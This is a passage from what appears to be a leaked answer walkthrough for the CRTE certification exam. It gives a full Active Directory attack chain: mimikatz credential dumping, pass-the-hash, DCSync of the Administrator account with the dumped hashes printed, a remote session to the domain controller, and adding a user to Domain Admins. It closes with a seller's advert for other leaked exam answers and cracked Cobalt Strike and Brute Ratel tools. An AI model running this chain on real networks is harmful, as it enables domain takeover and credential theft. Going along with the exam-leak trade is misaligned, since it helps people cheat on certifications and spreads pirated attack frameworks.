 . .\Invoke-Mimikatz.ps1

Now let’s dump!

Invoke-Mimikatz

New loot → PAWSRV$ / 1a2b6a8c280d5f21ff5f0391dbf7d077

Now let’s use it :

Invoke-Mimikatz -Command ‘"sekurlsa::pth /user:PAWSRV$ /domain:CITADEL.CORP /ntlm:1a2b

6a8c280d5f21ff5f0391dbf7d077 /run:powershell.exe"’

Opened a new powershell window on CITADEL.CORP , now let’s dump the ADMIN
NTLM hash

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:citadel.corp /user:Administrator"'

CRTE EX 28
 .#####. mimikatz 2.2.0 (x64)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::dcsync /domain:citadel.corp /user:Administrator

[DC] 'citadel.corp' will be the domain
[DC] 'citadel-dc.citadel.corp' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change :
Object Security ID : S-1-5-21-253487801-221673152-1815095224-500
Object Relative ID : 500

Credentials:
Hash NTLM: 637abdcb6a5acb09030156bf99b359a2
ntlm- 0: 637abdcb6a5acb09030156bf99b359a2
ntlm- 1: bcecf7d2efeb76139da904fb78158178
lm - 0: 5edfac69baad536d6c7ec17b600ea12f

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 0469be4cce55654cb7ee2b7d66434928

* Primary:Kerberos-Newer-Keys *
Default Salt : CITADEL.CORPAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e400353d6be6deec9345e514d63a50519c10e7e36f0b6bdc6c2ca
1b2eb4fbbec
aes128_hmac (4096) : 66aca29194db0258854759cb46209813
des_cbc_md5 (4096) : 3ea858ec7a433b4c
OldCredentials
aes256_hmac (4096) : 476acd473ba6f7ed90539e139c7c2832bb3501fff49d41831353e
fd15e6a766c
aes128_hmac (4096) : 60993e9f10913c80d50111232f722f6d
des_cbc_md5 (4096) : cd7f4c4a5d7aec9e
OlderCredentials
aes256_hmac (4096) : 5f1cf251cd62c9506b27e6ae518efdc63eeb6673c35186c26b102
177979066c7
aes128_hmac (4096) : a5d261be5494386ed065897dc4ee0650
des_cbc_md5 (4096) : 0798da2315980d68

* Primary:Kerberos *
Default Salt : CITADEL.CORPAdministrator
Credentials

CRTE EX 29
 des_cbc_md5 : 3ea858ec7a433b4c
OldCredentials
des_cbc_md5 : cd7f4c4a5d7aec9e

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 bf493e79c34384811b57c503ca4bc7aa
02 ed5ee4e75aa21fa2f49ed3afc679cd6e
03 2847e3b83c8b274f8728ba9234e49ff4
04 bf493e79c34384811b57c503ca4bc7aa
05 7de77f5b56c2e5a8e405629b1a321a12
06 46f7e34a8323911239fc9c87cd2a777c
07 b127875dbfaba680b4a40855c278b5d8
08 52e4dc956ce1d599833fa167669aa1f8
09 90ae884d3af927f43d810f23cbe5e156
10 a44efd708c93b583b4ca4d6165b962f2
11 8d1e2105f9b6f4c3a4ec4a3c291da423
12 52e4dc956ce1d599833fa167669aa1f8
13 d3f54a009e47770099e771a251ad5a4c
14 3f7785b9d175f0afa58440c7926b8490
15 e46ff2a869f971f424adacc99942126a
16 01877572f661cacee911e92065b36fa6
17 8acdbbc36208c882a0bbd53c728ebfd5
18 5173f9eb00e44c74e193a658a0fe2ede
19 38e11910d8adf5829c30ce2dfa522ba3
20 7a9ce11df50edde299b305060a00761d
21 422d112719c38136dfd82b90061ff202
22 c4cccebeb39e45e8ad50b3ea1d9e2bf7
23 ebf6d98199472b4213be5cec4be34b9e
24 24df0cef68238c6d43eea652e993ba09
25 46855760f44de9936dded2cb3216a898
26 bc7399a5dc088bd8e3b999dc9d79b6ed
27 542e462ebf49192b76b3f7d2dc71880a
28 bd48aa461824c65f40cd38e9b6ed3916
29 35f084ad41ec014b7d2ac9f09acd33db

The one that we need it → 637abdcb6a5acb09030156bf99b359a2

Now we can pth :

.\SafetyKatz.exe "sekurlsa::pth /user:Administrator /domain:citadel.corp /ntlm:637abdc

b6a5acb09030156bf99b359a2 /run:powershell.exe" "exit"

It will open a new powershell windows as administrator , and we can enter CITADEL-
DC and we are ADMINISTRATOR!

Enter-PSSession -ComputerName CITADEL-DC

CRTE EX 30
 whoami;hostname

Add the studentuser to the Domain Admins

net group "Domain Admins" studentuser /add /domain

NOW THE EXAM IS DONE! Make sure to rep me up! Make sure to tell anyone I’m
the legit one and the first on the market! IT WILL HELP ME OUT WITH GREAT
RELEASES!
ALWAYS FIRST ONE ON THE MARKET!

VERY IMPORTANT!

THIS ONE IS CREATED BY ME

IF YOU BOUGHT IT FROM A RESELLER!
DM me !
Discord or telegram

Get my accounts from breached.to , DM ME THERE TO!

Search me !
YOU will get MONEY/GIFT!

ALSO together will talk with ADMIN to see who is the scammer!

CRTE EX 31
 DON'T RUIN MY WORK , CAUSE IT'S SHAME TO LET THOSE “PEOPLE”
GETTING
MONEY ON NOTHING MADE BY THEM!

I'm the FIRST who will do this !

MONEY / GIFT!
Cheers mates!

Keep the comunity CLEAN!

NO SCAM, NO LEAKS , HONESTITY AND WELL EDUCATED SELLERS &

CUSTOMERS!

P.S. Check my other sales!

1. CRTO exam (teamviewer too)

2. CRTP exam

3. CRTE WRITEUP FOR LAB (only on on the market with all the flags! )

4. GCB WRITEUP FOR LAB (only on on the market with all the flags! )

5. COBALT STRIKE FULL 4.7 LIFETIME LICENSE + UPDATED ARTIFACT KIT

(and more stuff for it)

6. BRUTE RATEL 1.2.2 THE ONLY ONE WORKING ON THE MARKET , OWN
PERSONAL CRACK THAT WORKS!

CRTE EX 32